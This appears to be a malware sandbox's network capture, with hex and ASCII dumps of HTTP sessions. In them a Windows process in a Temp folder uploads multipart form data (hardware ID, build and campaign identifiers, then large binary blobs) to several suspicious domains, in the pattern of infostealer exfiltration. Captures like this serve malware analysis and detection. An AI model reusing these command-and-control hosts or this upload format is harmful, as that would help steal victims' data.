Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-22 01:19:03 UTC	124	IN	Data Raw: 35 64 38 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 70 73 35 20 70 72 6f 22 2c 22 72 6f 68 20 77 72 65 73 74 6c 69 6e 67 20 66 69 6e 61 6c 20 62 61 74 74 6c 65 22 2c 22 63 6f 6d 6d 65 72 63 69 61 6c 20 74 65 61 20 62 61 67 73 20 6d 69 63 72 6f 70 6c 61 73 74 69 63 73 22 2c 22 64 6f 67 65 63 6f 69 6e 20 70 72 69 63 65 20 70 72 65 64 69 63 74 69 6f 6e 22 2c 22 61 6e 74 68 6f Data Ascii: 5d8)]}'["",["ps5 pro","roh wrestling final battle","commercial tea bags microplastics","dogecoin price prediction","antho
2024-12-22 01:19:03 UTC	1379	IN	Data Raw: 6e 79 20 72 69 7a 7a 6f 22 2c 22 74 68 65 20 65 64 64 69 65 20 61 69 6b 61 75 20 62 69 67 20 77 61 76 65 20 69 6e 76 69 74 61 74 69 6f 6e 61 6c 22 2c 22 75 72 73 69 64 73 20 6d 65 74 65 6f 72 20 73 68 6f 77 65 72 22 2c 22 61 70 70 6c 65 20 69 70 68 6f 6e 65 20 31 37 20 70 72 6f 20 6d 61 78 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 Data Ascii: ny rizzo","the eddie aikau big wave invitational","ursids meteor shower","apple iphone 17 pro max"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggest
2024-12-22 01:19:03 UTC	89	IN	Data Raw: 35 33 0d 0a 50 63 46 64 79 53 47 70 46 65 53 39 59 4d 6d 59 78 63 57 78 77 53 6d 73 77 4d 43 74 55 54 54 4e 61 63 57 4e 6b 64 48 49 32 56 30 56 49 56 47 4a 78 51 6a 52 57 59 54 64 6c 57 6c 6f 31 59 32 68 58 56 57 73 33 55 58 42 51 51 6a 56 4b 53 6e 67 77 64 30 0d 0a Data Ascii: 53PcFdySGpFeS9YMmYxcWxwSmswMCtUTTNacWNkdHI2V0VIVGJxQjRWYTdlWlo1Y2hXVWs3UXBQQjVKSngwd0
2024-12-22 01:19:03 UTC	1390	IN	Data Raw: 37 33 31 0d 0a 30 76 51 32 64 59 53 6d 59 33 55 45 77 7a 56 32 55 34 4d 6b 35 7a 65 44 55 30 4e 48 46 6b 56 44 5a 59 59 33 70 54 55 32 46 51 57 6c 4a 36 61 55 68 5a 65 6b 74 61 51 6d 78 44 4e 6d 64 61 57 56 6f 34 4f 43 74 6d 61 55 74 72 64 58 51 34 53 6b 70 5a 53 7a 5a 4c 5a 6b 39 46 63 45 70 6e 4e 6b 64 36 63 31 5a 52 54 6d 55 32 62 6d 46 53 63 6d 35 77 53 45 6c 44 56 44 67 76 4d 6b 35 6b 64 48 46 31 5a 31 64 75 52 6e 52 42 4f 54 49 32 4f 55 35 78 59 6e 5a 52 64 48 67 32 56 6e 46 31 54 33 6c 76 4c 32 64 30 64 47 4e 53 55 6a 6b 7a 59 30 4a 4e 65 57 39 6d 52 54 42 76 57 47 46 59 52 31 52 47 51 57 39 71 4f 48 6c 55 61 57 67 35 62 43 74 72 54 44 68 51 57 58 64 71 64 46 42 6b 55 33 52 30 64 44 6c 4d 55 30 56 6c 51 6d 31 5a 61 32 34 31 51 56 6b 72 64 47 51 76 Data Ascii: 7310vQ2dYSmY3UEwzV2U4Mk5zeDU0NHFkVDZYY3pTU2FQWlJ6aUhZektaQmxDNmdaWVo4OCtmaUtrdXQ4SkpZSzZLZk9FcEpnNkd6c1ZRTmU2bmFScm5wSElDVDgvMk5kdHF1Z1duRnRBOTI2OU5xYnZRdHg2VnF1T3lvL2d0dGNSUjkzY0JNeW9mRTBvWGFYR1RGQW9qOHlUaWg5bCtrTDhQWXdqdFBkU3R0dDlMU0VlQm1Za241QVkrdGQv
2024-12-22 01:19:03 UTC	458	IN	Data Raw: 6c 53 6e 70 71 4e 48 52 4d 55 44 46 55 5a 45 6c 55 4d 48 4e 36 54 47 4e 7a 65 56 6c 51 56 47 6c 55 59 33 64 79 65 57 4e 71 55 48 45 78 55 57 39 35 63 58 6c 78 65 57 64 6a 51 57 51 33 55 55 70 51 64 33 41 47 63 41 63 5c 75 30 30 33 64 22 2c 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 65 76 65 6e 74 69 64 22 3a 36 36 38 32 34 38 36 33 31 39 39 33 34 30 33 31 36 36 31 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 72 65 6c 65 76 61 6e 63 65 22 3a 5b 31 32 35 37 2c 31 32 35 36 2c 31 32 35 35 2c 31 32 35 34 2c 31 32 35 33 2c 31 32 35 32 2c 31 32 35 31 2c 31 32 35 30 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 Data Ascii: lSnpqNHRMUDFUZElUMHN6TGNzeVlQVGlUY3dyeWNqUHExUW95cXlxeWdjQWQ3UUpQd3AGcAc\u003d","zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":6682486319934031661,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:sug
2024-12-22 01:19:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.4	50264	104.21.67.146	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:19:03 UTC	369	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=00GUKPW01ECHG9 Cookie: __cf_mw_byp=IjjBQ74NQR3Cy3LPi8f7NG.yiYgwJYrvuAxBctfN9tI-1734830334-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18142 Host: cheapptaxysu.click
2024-12-22 01:19:03 UTC	15331	OUT	Data Raw: 2d 2d 30 30 47 55 4b 50 57 30 31 45 43 48 47 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 30 30 47 55 4b 50 57 30 31 45 43 48 47 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 30 47 55 4b 50 57 30 31 45 43 48 47 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 0d 0a 2d 2d 30 30 47 55 4b Data Ascii: --00GUKPW01ECHG9Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--00GUKPW01ECHG9Content-Disposition: form-data; name="pid"2--00GUKPW01ECHG9Content-Disposition: form-data; name="lid"CZJvss--geopoxid--00GUK
2024-12-22 01:19:03 UTC	2811	OUT	Data Raw: 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 Data Ascii: d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wEC
2024-12-22 01:19:04 UTC	1130	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:19:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ooo0uhdevoalf8nvjndsj25jsa; expires=Wed, 16 Apr 2025 19:05:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M3nKJNuoQOjn2lYUXaifH6OtC2RQy0GOPHDXx6fEbl1NlpvLWjkJHNMIdyCCKHzS6gCfCtJBgU%2BIJXDsmqSRIIth7IMkOZNQuyzhtAn3hoa1uG54nX%2FW5L2fB7eH27txwjXGpZc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c480e08750f7d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1487&rtt_var=773&sent=16&recv=22&lost=0&retrans=0&sent_bytes=2842&recv_bytes=19191&delivery_rate=1242553&cwnd=217&unsent_bytes=0&cid=c9019e49d02fbec2&ts=1140&x=0"
2024-12-22 01:19:04 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:19:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.4	50274	104.21.67.146	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:19:05 UTC	363	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=45QMJ3WTD Cookie: __cf_mw_byp=IjjBQ74NQR3Cy3LPi8f7NG.yiYgwJYrvuAxBctfN9tI-1734830334-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8733 Host: cheapptaxysu.click
2024-12-22 01:19:05 UTC	8733	OUT	Data Raw: 2d 2d 34 35 51 4d 4a 33 57 54 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 34 35 51 4d 4a 33 57 54 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 35 51 4d 4a 33 57 54 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 0d 0a 2d 2d 34 35 51 4d 4a 33 57 54 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 Data Ascii: --45QMJ3WTDContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--45QMJ3WTDContent-Disposition: form-data; name="pid"2--45QMJ3WTDContent-Disposition: form-data; name="lid"CZJvss--geopoxid--45QMJ3WTDContent-D
2024-12-22 01:19:06 UTC	1135	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:19:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=u7mbe2q3e0e06vi8ae25a3jpuo; expires=Wed, 16 Apr 2025 19:05:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=drQTzGisjlEkg1p1Tv%2Fe7yCXKY134DG77OpAm98%2FPqLLFRqdo%2B3LVLtnBnTx3Uqk3PSlFAzZKcRXDoACR9CBaMrS2cFMernrLSVVE1DRn%2BivOUNInhupDeg3xjaLDOdRHn%2B8ylQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c481dbd21726e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2014&min_rtt=2013&rtt_var=758&sent=10&recv=14&lost=0&retrans=0&sent_bytes=2844&recv_bytes=9754&delivery_rate=1441263&cwnd=224&unsent_bytes=0&cid=61d6a9168b2f397a&ts=1134&x=0"
2024-12-22 01:19:06 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:19:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.4	50276	104.21.21.99	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:19:05 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=76C562P8LE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 46703 Host: discokeyus.lat
2024-12-22 01:19:05 UTC	15331	OUT	Data Raw: 2d 2d 37 36 43 35 36 32 50 38 4c 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 37 36 43 35 36 32 50 38 4c 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 36 43 35 36 32 50 38 4c 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 37 36 43 35 36 32 50 38 4c 45 0d 0a 43 6f 6e 74 65 6e 74 2d Data Ascii: --76C562P8LEContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--76C562P8LEContent-Disposition: form-data; name="pid"1--76C562P8LEContent-Disposition: form-data; name="lid"PsFKDg--pablo--76C562P8LEContent-
2024-12-22 01:19:05 UTC	15331	OUT	Data Raw: 92 1a 1c 7f fe 03 5c eb 7e 0b b7 98 18 d6 40 0f fd 75 90 55 1e ce 18 f8 94 dd c6 73 5d bb 71 61 df e6 31 81 e1 a4 ec df d6 5f 5e a1 19 52 43 27 2a 85 df d2 6c ee d3 4f 2f cc 44 75 8a 38 ae 7e 8a 26 ff fb f8 c1 eb 06 0e 3a 93 fc da c9 2f a4 62 c5 c5 9c 19 b2 4a 1c 1f 47 21 c7 88 aa 5f c7 b1 ee 8a 65 90 db d4 ef f8 35 08 24 78 44 45 aa 6f f5 7e 90 df 8a 5d df 38 83 ad 83 18 ac 51 2f f1 09 f1 0e 0b 5d 02 a2 22 fe 68 59 a2 f0 34 6e 68 6a 43 80 1c e2 db 6a ef 5a ad 68 f6 9a 58 d7 07 21 c4 74 27 79 1e ae c0 ce be 13 05 5f 6c 58 7e 62 85 ac 6f 5b bc b5 bd 1f 1d 0b c6 45 7e 6a 6e 57 ee 54 08 1e b2 57 14 25 e2 a5 c3 67 23 e2 62 cb c5 9e b0 ee b9 cd 34 aa 08 a9 92 1d d4 b2 58 c1 61 5a 0c 50 b3 94 5e 10 db be 2f 7e 47 40 bc 65 81 d4 4b f8 27 6b e4 31 50 47 80 ea ee Data Ascii: \~@uUs]qa1_^RC'*lO/Du8~&:/bJG!_e5$xDEo~]8Q/]"hY4nhjCjZhX!t'y_lX~bo[E~jnWTW%g#b4XaZP^/~G@eK'k1PG
2024-12-22 01:19:05 UTC	15331	OUT	Data Raw: a5 36 5c 54 2a 49 10 4a 69 23 52 05 91 ea 7d e1 f3 f2 44 96 78 e6 87 de 80 a7 38 76 f3 14 f2 3e 17 4e 66 b8 89 56 cb f8 48 38 cb 37 26 7c 45 c6 ce 21 d4 e0 5f 65 67 91 1e c0 e9 1d 66 5e f0 f8 84 c7 20 6d f5 97 40 7c 81 c3 f7 7f 90 38 4d 1d b0 d0 1e 7f 16 7d 86 b9 af 80 bd bc f1 07 b0 2b 3e cd 79 99 f2 7f 94 f0 0b 35 8d 69 c0 ae 24 ed b5 cb 17 ff f9 bc 95 de f8 bf 9d 88 ff 27 db df 8a 0c 46 2f ab 91 86 3e 11 b7 ff c7 b2 ea 63 ee 1f 38 de 92 25 5f fd d3 2c fc cf a7 a4 9b 2f 5f 3d 26 d8 f4 c4 df 15 98 b6 ae 7e 5d 79 43 1a f6 49 69 8e ec 12 7d b6 ff 4d 40 bd 86 c8 74 0a 3d f4 fd 39 d2 58 f2 f9 ff d9 cf 5f 30 40 e3 d2 9e 75 a4 5e 69 71 a1 62 d4 75 ab b1 70 ba 8c 14 ea ef 70 b0 ba 53 23 e8 79 e8 bb 32 c4 17 6e f6 d1 89 83 d0 69 6c f7 90 63 45 1f 7d 8d 63 44 a8 Data Ascii: 6\T*IJi#R}Dx8v>NfVH87&\|E!_egf^ m@\|8M}+>y5i$'F/>c8%_,/_=&~]yCIi}M@t=9X_0@u^iqbuppS#y2nilcE}cD
2024-12-22 01:19:05 UTC	710	OUT	Data Raw: bf 8f d0 54 d9 c0 26 b6 aa 6d 73 c8 6f 4d ef 91 86 da 16 47 e3 6c 92 e6 07 53 db 33 bb 17 96 6d b9 3b c3 84 e2 b9 e4 09 c5 36 ca d3 39 87 9e 78 f9 dc 54 e7 12 cd d8 60 bc 68 26 33 de ee 4e 39 12 d2 b1 e3 46 50 11 94 c0 de 14 cf b3 6c d4 f7 c7 57 d1 72 2c 2d 4b b0 4e 68 f4 48 64 45 4e 1e fa 53 2f 80 89 19 81 5d 18 84 4d d1 36 68 33 8c 46 4b 84 d0 5a 5b b4 c8 84 6e 8b 20 d6 3c 9c 26 28 6b 57 ee 87 92 64 18 6a 19 86 2a 01 bb 35 f0 03 c2 e7 13 3b 49 4d 8d 8f 90 92 fa fe 2f 7c cb 0b 8c 2b fc 24 ca 93 96 42 ca 07 03 5d f0 8f f2 d7 dc 3c fa 5c de 85 90 00 79 cd 83 04 85 8d b4 eb b3 b3 55 f9 47 cf 73 90 d0 9c f8 a4 53 bc a6 6c 82 73 0d ab 8f 87 a2 f8 6a dd 00 e2 a3 79 6f 04 97 91 1d 17 c8 7b 47 52 77 a7 19 d6 b9 a5 4d d0 67 af d9 44 3b be ce 36 59 38 60 65 be 1d Data Ascii: T&msoMGlS3m;69xT`h&3N9FPlWr,-KNhHdENS/]M6h3FKZ[n <&(kWdj*5;IM/\|+$B]<\yUGsSlsjyo{GRwMgD;6Y8`e
2024-12-22 01:19:07 UTC	1129	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:19:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n4gmkq779o8vcnmovio4d2v1q1; expires=Wed, 16 Apr 2025 19:05:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jFJEeWoPL5L9%2BY%2BaHr0M1hYGsXuoyfSaJjnIczXVZ0ECyh8Y9K2IAaRuLmGgeDxDP07SUXJ73QiFLsrynwqybzhVaIEA3wOrvOXI6aSGvvHKA5LmeThv5Z3v2YT1rBW7qw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c481f6a2b8c33-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2562&min_rtt=2107&rtt_var=1115&sent=31&recv=52&lost=0&retrans=0&sent_bytes=2833&recv_bytes=47743&delivery_rate=1385856&cwnd=245&unsent_bytes=0&cid=e18e63c8cd40f38d&ts=1492&x=0"
2024-12-22 01:19:07 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:19:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	50284	104.21.89.115	443	7796	C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:19:08 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=B81801Z0B83NBVBFH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 312218 Host: fieldhitty.click
2024-12-22 01:19:08 UTC	15331	OUT	Data Raw: 2d 2d 42 38 31 38 30 31 5a 30 42 38 33 4e 42 56 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 42 38 31 38 30 31 5a 30 42 38 33 4e 42 56 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 38 31 38 30 31 5a 30 42 38 33 4e 42 56 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 76 62 41 72 5a 2d 2d 0d 0a 2d 2d 42 38 31 38 Data Ascii: --B81801Z0B83NBVBFHContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--B81801Z0B83NBVBFHContent-Disposition: form-data; name="pid"1--B81801Z0B83NBVBFHContent-Disposition: form-data; name="lid"PvbArZ----B818
2024-12-22 01:19:08 UTC	15331	OUT	Data Raw: 4a bf ed eb 5f 93 12 03 bc 6d 50 7a 28 d2 ac 16 b1 3c 9a f4 f6 aa 06 51 d4 ba 0f 53 f5 7d 77 69 85 6f d1 da e1 88 06 5b 6f d7 51 87 2d ba 88 21 e5 46 4c 99 d0 16 e0 a2 55 ae b6 7a 7e 40 9a f7 76 a5 38 99 e5 d4 55 e3 28 b9 e9 88 b0 58 44 5c 9c 11 06 38 95 40 b0 d9 ec 46 0f 3e 3b 99 34 44 7a 11 e7 16 9b 11 b1 a2 56 e8 f1 35 40 39 d4 8a 14 fe c1 ed 21 77 57 56 ba 86 90 c3 50 ad 9c fc bc c7 cb 7a 95 3b 8e f2 57 3d 87 95 55 81 8d 56 01 7e 10 02 ea b7 42 db c3 87 c5 86 d7 ae 55 37 32 fc 99 18 a5 cb 20 fb 7c 34 bb 68 45 ae ee b0 1e b3 9e 7f 54 fe fe c1 46 92 30 d7 12 cd e3 6e 76 f0 56 a7 f1 d8 6e a8 f1 87 83 28 98 91 3c e7 80 26 17 cb 13 d7 70 7d e5 cf c6 71 6b 0d 30 b3 80 13 bf f5 01 f7 87 60 1c 8c 01 64 b5 1c 53 f4 f2 06 fe 73 48 b9 21 7b 02 b0 ad 3f 94 ba ca Data Ascii: J_mPz(<QS}wio[oQ-!FLUz~@v8U(XD\8@F>;4DzV5@9!wWVPz;W=UV~BU72 \|4hETF0nvVn(<&p}qk0`dSsH!{?
2024-12-22 01:19:08 UTC	15331	OUT	Data Raw: 58 b2 27 44 65 c2 e8 5e 7f 8c 3b 59 bb a6 12 78 ea 1a 70 54 fe c1 fe 98 7c 48 ba 1a c4 22 27 57 5b f4 fd 64 6e 51 2c aa a7 21 2b 8f 37 71 0e 1f e8 53 cf 4c 22 14 d9 27 ea 59 bc 57 98 e7 05 46 15 e1 cb 82 f7 1f 16 65 42 c7 76 ac c7 4c 38 f1 8f 87 f3 95 85 6b d2 a5 ea a1 3e 0e 0e 0d 6f 27 12 f8 d2 7a 18 23 16 82 75 34 c8 1c d6 43 93 a1 d0 88 d1 3d 23 d0 49 10 42 5c 14 85 08 f7 dc 61 f8 1a c8 05 3d 81 8a d3 16 5f 39 06 f3 e0 c4 30 73 03 f7 f2 6f 55 ef 4c f4 7c 84 82 19 c0 36 bc e2 04 06 ec 4b f8 c6 00 0c 64 1b 03 df f8 66 ac 4a 3e 30 3e 38 ea e3 02 b4 f8 a5 4f 4f ae d3 17 2a 7a 7a e3 ef 1b 6d 56 f5 0f bb 1b 6b 79 dc 73 62 8d 64 55 e4 7f a7 6a 29 83 5f 1a 48 e4 1d 78 86 1b 0d 45 b5 e7 2d 4b e8 5b 1e 97 ae ef 98 e1 82 c3 35 81 a8 e3 1b 9c 1b 05 cc c0 eb f7 00 Data Ascii: X'De^;YxpT\|H"'W[dnQ,!+7qSL"'YWFeBvL8k>o'z#u4C=#IB\a=_90soUL\|6KdfJ>0>8OO*zzmVkysbdUj)_HxE-K[5
